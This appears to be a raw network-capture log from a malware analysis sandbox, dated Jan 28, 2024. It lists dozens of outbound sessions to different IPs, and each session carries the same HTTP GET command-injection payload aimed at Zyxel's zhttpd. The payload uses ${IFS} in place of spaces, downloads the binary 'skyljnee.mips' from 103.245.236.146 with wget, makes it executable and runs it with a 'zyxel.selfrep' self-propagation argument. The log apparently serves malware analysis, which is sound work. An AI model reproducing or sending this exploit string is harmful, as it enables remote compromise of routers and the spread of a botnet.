                                                        Jan 28, 2024 10:12:57.491389036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5545192.168.2.1434438189.125.36.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491422892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5546192.168.2.145509470.228.83.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491480112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5547192.168.2.1439646157.106.39.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491503954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5548192.168.2.144802214.129.14.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491555929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5549192.168.2.143971637.39.14.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491585016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5550192.168.2.14441149.74.153.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491620064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5551192.168.2.14506948.251.27.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491666079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5552192.168.2.1449524172.189.162.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491699934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5553192.168.2.1447072143.211.234.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491724014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5554192.168.2.1456782191.195.119.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491764069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5555192.168.2.1455574201.193.137.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491796970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5556192.168.2.1438954140.77.243.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491852999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5557192.168.2.144630062.106.72.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491900921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5558192.168.2.145887848.181.87.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491926908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5559192.168.2.144801092.173.225.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.491966963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5560192.168.2.143547651.223.254.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492012024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5561192.168.2.1451356137.226.202.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492038012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5562192.168.2.1452120146.229.208.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492089033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5563192.168.2.1452638153.193.189.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492122889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5564192.168.2.144578877.86.83.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492177010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5565192.168.2.143670253.11.210.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492216110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5566192.168.2.145641824.238.167.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492266893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5567192.168.2.1447062112.25.182.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492322922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5568192.168.2.1452840152.95.121.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492337942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5569192.168.2.1454824142.131.185.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492379904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5570192.168.2.144043018.117.32.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492418051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5571192.168.2.1447720198.156.111.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492453098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5572192.168.2.145895072.245.96.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492515087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5573192.168.2.1447776130.133.32.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492544889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5574192.168.2.1444124136.207.171.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492575884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5575192.168.2.1434864152.179.217.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492609024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5576192.168.2.144471486.132.114.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492660999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5577192.168.2.143766857.59.77.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492681980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5578192.168.2.1437836171.175.202.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492707014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5579192.168.2.145801095.163.80.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492762089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5580192.168.2.1446900104.41.250.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492810011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5581192.168.2.1457976163.144.60.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492826939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5582192.168.2.143860095.65.189.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492878914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5583192.168.2.1434132199.68.148.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492921114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5584192.168.2.1445964139.208.188.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.492965937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5585192.168.2.144406848.236.27.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493001938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5586192.168.2.1442956100.156.238.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493041039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5587192.168.2.1445932152.77.238.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493082047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5588192.168.2.1434714203.245.196.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493113995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5589192.168.2.1440830175.5.209.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493172884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5590192.168.2.1454018193.3.247.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493206024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5591192.168.2.1436718140.60.239.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493244886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5592192.168.2.1452262103.226.162.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493280888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5593192.168.2.144573288.193.4.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493303061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5594192.168.2.143874678.216.18.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493329048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5595192.168.2.1448798189.32.78.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493388891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5596192.168.2.1455138221.216.24.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493418932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5597192.168.2.1450194160.95.239.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493459940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5598192.168.2.145607043.184.198.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493484020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5599192.168.2.1454942138.161.74.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493511915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5600192.168.2.1454498159.122.157.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493546963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5601192.168.2.144154261.116.204.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493598938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5602192.168.2.14423785.183.216.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493634939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5603192.168.2.1436368206.44.34.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493693113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5604192.168.2.145156675.239.165.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:57.493726015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5605192.168.2.1448656168.153.11.196443
                                                        TimestampBytes transferredDirectionData
